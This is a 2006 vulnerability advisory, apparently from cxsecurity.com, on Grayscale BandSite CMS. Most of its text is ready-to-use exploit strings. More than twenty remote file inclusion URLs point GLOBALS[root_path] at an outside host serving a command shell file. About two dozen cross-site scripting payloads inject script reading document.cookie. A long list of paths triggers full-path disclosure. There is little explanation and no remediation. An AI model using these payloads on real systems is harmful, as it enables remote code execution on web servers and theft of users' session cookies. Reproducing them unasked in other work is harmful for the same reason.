Grayscale BandSite CMS Multiple Input Validation Vulnerabilities

2006-09-28 / 2006-09-29
Credit: soqor
Risk: High
Local: No
Remote: Yes
CWE: N/A

Hello,, Grayscale BandSite CMS Multiple Input Validation Vulnerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] Romote Include includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.go oglepages.com/cmd.txt? adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http:// psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addfliersform.php?GLOBALS[root_path]=http: //psevil.googlepages.com/cmd.txt? includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.go oglepages.com/cmd.txt? adminpanel/includes/add_forms/addbioform.php?GLOBALS[root_path]=http://p sevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addwearmerchform.php?GLOBALS[root_path]=ht tp://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addlyricsform.php?GLOBALS[root_path]=http: //psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addlinksform.php?GLOBALS[root_path]=http:/ /psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addinterviewsform.php?GLOBALS[root_path]=h ttp://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addgenmerchform.php?GLOBALS[root_path]=htt p://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addshowsform.php?GLOBALS[root_path]=http:/ /psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addreviewsform.php?GLOBALS[root_path]=http ://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addrelmerchform.php?GLOBALS[root_path]=htt p://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addreleasepicform.php?GLOBALS[root_path]=h ttp://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addreleaseform.php?GLOBALS[root_path]=http ://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addphotosform.php?GLOBALS[root_path]=http: //psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addnewsform.php?GLOBALS[root_path]=http:// psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://psevi l.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addmerchpicform.php?GLOBALS[root_path]=htt p://psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addmerchform.php?GLOBALS[root_path]=http:/ /psevil.googlepages.com/cmd.txt? adminpanel/includes/add_forms/addmembioform.php?GLOBALS[root_path]=http: //psevil.googlepages.com/cmd.txt? Xss adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(docum ent.cookie);</script> adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(docu ment.cookie);</script> adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>a lert(document.cookie);</script> adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><s cript>alert(document.cookie);</script> adminpanel/includes/header.php?the_band=</title><script>alert(document.c ookie);</script> adminpanel/login_header.php?the_band=</title><script>alert(document.cook ie);</script> includes/content/bio_content.php?the_band=<Script>alert(document.cookie) ;</script> includes/content/gbook_content.php?the_band=<script>alert(document.cooki e);</script> includes/content/interview_content.php?the_band=<script>alert(document.c ookie);</script> includes/content/links_content.php?the_band=<script>alert(document.cooki e);</script> includes/content/lyrics_content.php?the_band=<script>alert(document.cook ie);</script> includes/content/member_content.php?the_band=<script>alert(document.cook ie);</script> includes/content/merch_content.php?the_band=<script>alert(document.cooki e);</script> includes/content/mp3_content.php?the_band=<script>alert(document.cookie) ;</script> includes/content/news_content.php?the_band=<script>alert(document.cookie );</script> includes/content/pastshows_content.php?the_band=<script>alert(document.c ookie);</script> includes/content/photo_content.php?the_band=<script>alert(document.cooki e);</script> includes/content/releases_content.php?the_band=<script>alert(document.co okie);</script> includes/content/reviews_content.php?the_band=<script>alert(document.coo kie);</script> includes/content/shows_content.php?the_band=<script>alert(document.cooki e);</script> includes/content/signgbook_content.php?the_band=<script>alert(document.c ookie);</script> includes/footer.php?this_year=<script>alert(document.cookie);</script> Full path includes/content/ open any file on this directory .. includes/shows_preview.php adminpanel/configform.php?submit=1 adminpanel/includes/mailinglist/disphtmltbl.php adminpanel/includes/mailinglist/dispxls.php adminpanel/includes/mailinglist/sendshows.php adminpanel/includes/previews/preview_bio.php adminpanel/includes/previews/preview_genmerch.php adminpanel/includes/previews/preview_fliers.php adminpanel/includes/previews/preview_gbook.php adminpanel/includes/previews/preview_interviews.php adminpanel/includes/previews/preview_links.php adminpanel/includes/previews/preview_lyrics.php adminpanel/includes/previews/preview_membio.php adminpanel/includes/previews/preview_merchphotos.php adminpanel/includes/previews/preview_mp3s.php adminpanel/includes/previews/preview_news.php adminpanel/includes/previews/preview_photos.php adminpanel/includes/previews/preview_releases.php adminpanel/includes/previews/preview_relmerch.php adminpanel/includes/previews/preview_relphotos.php adminpanel/includes/previews/preview_reviews.php adminpanel/includes/previews/preview_shows.php adminpanel/includes/previews/preview_wearmerch.php adminpanel/includes/change_forms/change_bio.php adminpanel/includes/change_forms/change_fliers.php adminpanel/includes/change_forms/change_gbook.php adminpanel/includes/change_forms/change_gen_merch.php adminpanel/includes/change_forms/change_interview.php adminpanel/includes/change_forms/change_links.php adminpanel/includes/change_forms/change_lyrics.php adminpanel/includes/change_forms/change_members.php adminpanel/includes/change_forms/change_merch.php adminpanel/includes/change_forms/change_merch_pic.php adminpanel/includes/change_forms/change_mp3s.php adminpanel/includes/change_forms/change_news.php adminpanel/includes/change_forms/change_photos.php adminpanel/includes/change_forms/change_rel_merch.php adminpanel/includes/change_forms/change_rel_pic.php adminpanel/includes/change_forms/change_releases.php adminpanel/includes/change_forms/change_reviews.php adminpanel/includes/change_forms/change_shows.php adminpanel/includes/change_forms/change_wear_merch.php WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top